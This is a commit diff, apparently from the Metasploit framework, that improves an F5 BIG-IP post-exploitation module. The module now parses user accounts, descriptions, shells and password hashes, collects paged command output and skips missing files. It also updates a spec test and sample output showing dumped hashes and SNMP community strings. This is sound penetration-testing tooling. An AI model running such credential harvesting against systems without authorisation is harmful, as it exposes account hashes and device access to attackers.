enhance user data parsing
This commit is contained in:
parent
537be9054d
commit
daa10ea735
|
@ -65,7 +65,9 @@ resource (f5_ssh.rb)> run
|
|||
[+] Saving to /home/h00die/.msf4/loot/20200820143944_default_2.2.2.2_F5.show_net_045166.txt
|
||||
[*] Gathering info from show running-config
|
||||
[+] Saving to /home/h00die/.msf4/loot/20200820143949_default_2.2.2.2_F5.show_running__097351.txt
|
||||
[+] 2.2.2.2:22 Username 'admin' and hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/
|
||||
[+] 2.2.2.2:22 Username 'admin' with description 'Admin User' and shell tmsh with hash $6$PQvaMmyS$Bn5.2qIin7rC34tHUQ1Vu6fEeuDzQZqc25TSiDsmbB903RENBisWbTN9Mqh7g2x26VUbxdzwUzzmL7fB4T2iy1
|
||||
[+] 2.2.2.2:22 Username 'superlegit' with description 'a user account' and shell tmsh with hash $6$FTQz2reX$U0o37QjQYdg42dwCcLa.1H85hVTriQtxhlMoIM0cs4DFyW5s26kbrEgZG5Mfaxi9fgFfHrvDBGad7ikXnEZIP0
|
||||
[+] 2.2.2.2:22 Username 't' with description 't' and shell none with hash $6$iajXIq2B$ezy4hVW9A.5eN1xG4JZWFbY4bFaq7uUKwO9gDVLxvgzigsX4gquLW1NoSaZP9CtN0NnrbGV4QvtkA.esLJOg50
|
||||
[+] 2.2.2.2:22 SNMP Community 'public' with RO access
|
||||
[+] 2.2.2.2:22 SNMP Community 'rocommunity' with RO access
|
||||
[+] 2.2.2.2:22 SNMP Community 'rwcommunity' with RW access
|
||||
|
|
|
@ -5,13 +5,13 @@ require 'metasploit/framework/hashes/identify'
|
|||
module Msf
|
||||
###
|
||||
#
|
||||
# This module provides methods for working with Arista equipment
|
||||
# This module provides methods for working with F5 equipment
|
||||
#
|
||||
###
|
||||
module Auxiliary::F5
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def f5_config_eater(thost, tport, config)
|
||||
def f5_config_eater(thost, tport, config, store = true)
|
||||
|
||||
credential_data = {
|
||||
address: thost,
|
||||
|
@ -32,7 +32,9 @@ module Msf
|
|||
credential_data[:protocol] = 'udp'
|
||||
end
|
||||
|
||||
store_loot('f5.config', 'text/plain', thost, config.strip, 'config.txt', 'F5 Configuration')
|
||||
if store
|
||||
store_loot('f5.config', 'text/plain', thost, config.strip, 'config.txt', 'F5 Configuration')
|
||||
end
|
||||
|
||||
host_info = {
|
||||
host: thost,
|
||||
|
@ -54,15 +56,17 @@ module Msf
|
|||
# shell none
|
||||
# }
|
||||
|
||||
config.scan(%r{^auth user (.+) \{.+encrypted-password ([$\w/\+]+)}mi).each do |result|
|
||||
config.scan(%r{auth user ([^ ]+) {\s*description "?([^\n"]+)"?\n\s*encrypted-password ([$\w\+\./]+)\n[\w\s\-{}]+\s+shell (tmsh|bash|none)\n}}mi).each do |result|
|
||||
username = result[0].strip
|
||||
hash = result[1].strip
|
||||
description = result[1].strip
|
||||
hash = result[2].strip
|
||||
shell = result[3].strip
|
||||
cred = credential_data.dup
|
||||
cred[:username] = username
|
||||
cred[:jtr_format] = identify_hash(hash)
|
||||
cred[:private_data] = hash
|
||||
create_credential_and_login(cred)
|
||||
print_good("#{thost}:#{tport} Username '#{username}' and hash #{hash}")
|
||||
print_good("#{thost}:#{tport} Username '#{username}' with description '#{description}' and shell #{shell} with hash #{hash}")
|
||||
end
|
||||
|
||||
# generated by: tmsh list sys snmp communities
|
||||
|
@ -123,12 +127,12 @@ module Msf
|
|||
# }
|
||||
|
||||
if /^cm device (?<content>.+)}$/m =~ config
|
||||
if /hostname (?<hostname>[\w\.]+)$/ =~ content
|
||||
if /hostname (?<hostname>[\w\.-]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} Hostname: #{hostname}")
|
||||
host_info[:name] = hostname
|
||||
report_host(host_info)
|
||||
end
|
||||
if /base-mac (?<mac>[\d:a-f]+)$/ =~ content
|
||||
if /base-mac (?<mac>[\d:a-f]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} MAC Address: #{mac}")
|
||||
host_info[:mac] = mac
|
||||
report_host(host_info)
|
||||
|
@ -136,12 +140,12 @@ module Msf
|
|||
if /management-ip (?<ip>[\d\.]+)$/ =~ content
|
||||
print_good("#{thost}:#{tport} Management IP: #{ip}")
|
||||
end
|
||||
if /product (?<product>[\w-]+)$/ =~ content
|
||||
if /product (?<product>[\w-]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} Product #{product}")
|
||||
host_info[:os_name] = "F5 #{product}"
|
||||
report_host(host_info)
|
||||
end
|
||||
if /version (?<version>[\d\.]+)$/ =~ content
|
||||
if /version (?<version>[\d\.]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} OS Version: #{version}")
|
||||
host_info[:os_flavor] = version
|
||||
report_host(host_info)
|
||||
|
|
|
@ -25,11 +25,14 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def run
|
||||
# Get device prompt
|
||||
prompt = session.shell_command('')
|
||||
unless prompt.include? '(tmos)'
|
||||
prompt = session.shell_command('?')
|
||||
started_tmos = false
|
||||
unless prompt.include? 'Commands:'
|
||||
started_tmos = true
|
||||
print_status('Moving to TMOS prompt')
|
||||
session.shell_command('tmsh')
|
||||
end
|
||||
prompt = session.shell_command('')
|
||||
|
||||
# Get version info
|
||||
system_out = session.shell_command('show /sys version')
|
||||
|
@ -59,7 +62,11 @@ class MetasploitModule < Msf::Post
|
|||
# run additional information gathering
|
||||
|
||||
enum_tmos_configs(prompt)
|
||||
session.shell_command('quit') # exit tmos
|
||||
if started_tmos
|
||||
session.shell_command('quit') # exit tmos
|
||||
else
|
||||
session.shell_command('bash') # go to bash from tmos
|
||||
end
|
||||
enum_configs(prompt)
|
||||
end
|
||||
|
||||
|
@ -107,6 +114,13 @@ class MetasploitModule < Msf::Post
|
|||
if cmd_out.include?('---(less')
|
||||
cmd_out += session.shell_command(" \n" * 20) # 20 pages should be enough
|
||||
end
|
||||
|
||||
# loop to ensure we get all content within the 5 sec window
|
||||
loop do
|
||||
break unless out_tmp = session.shell_read
|
||||
cmd_out << out_tmp
|
||||
end
|
||||
|
||||
print_status("Gathering info from #{command}")
|
||||
cmd_loc = store_loot("F5.#{ec['fn']}",
|
||||
'text/plain',
|
||||
|
@ -115,7 +129,7 @@ class MetasploitModule < Msf::Post
|
|||
"#{ec['fn']}.txt",
|
||||
ec['desc'])
|
||||
vprint_good("Saving to #{cmd_loc}")
|
||||
f5_config_eater(host, port, cmd_out.strip)
|
||||
f5_config_eater(host, port, cmd_out.strip, store=false)
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -168,6 +182,10 @@ class MetasploitModule < Msf::Post
|
|||
command = ec['cmd']
|
||||
cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')
|
||||
print_status("Gathering info from #{command}")
|
||||
if cmd_out.include?('No such file or directory') || cmd_out.strip == ''
|
||||
print_error('File not found or empty')
|
||||
next
|
||||
end
|
||||
cmd_loc = store_loot("F5.#{ec['fn']}",
|
||||
'text/plain',
|
||||
session,
|
||||
|
@ -175,7 +193,7 @@ class MetasploitModule < Msf::Post
|
|||
"#{ec['fn']}.txt",
|
||||
ec['desc'])
|
||||
vprint_good("Saving to #{cmd_loc}")
|
||||
f5_config_eater(host, port, cmd_out.strip)
|
||||
f5_config_eater(host, port, cmd_out.strip, store=false)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -101,7 +101,7 @@ RSpec.describe Msf::Auxiliary::F5 do
|
|||
data << " }\n"
|
||||
data << " shell none\n"
|
||||
data << '}'
|
||||
expect(aux_f5).to receive(:print_good).with("127.0.0.1:161 Username 'admin' and hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/")
|
||||
expect(aux_f5).to receive(:print_good).with("127.0.0.1:161 Username 'admin' with description 'Admin User' and shell none with hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/")
|
||||
expect(aux_f5).to receive(:store_loot).with(
|
||||
'f5.config', 'text/plain', '127.0.0.1', data, 'config.txt', 'F5 Configuration'
|
||||
)
|
||||
|
|
Loading…
Reference in New Issue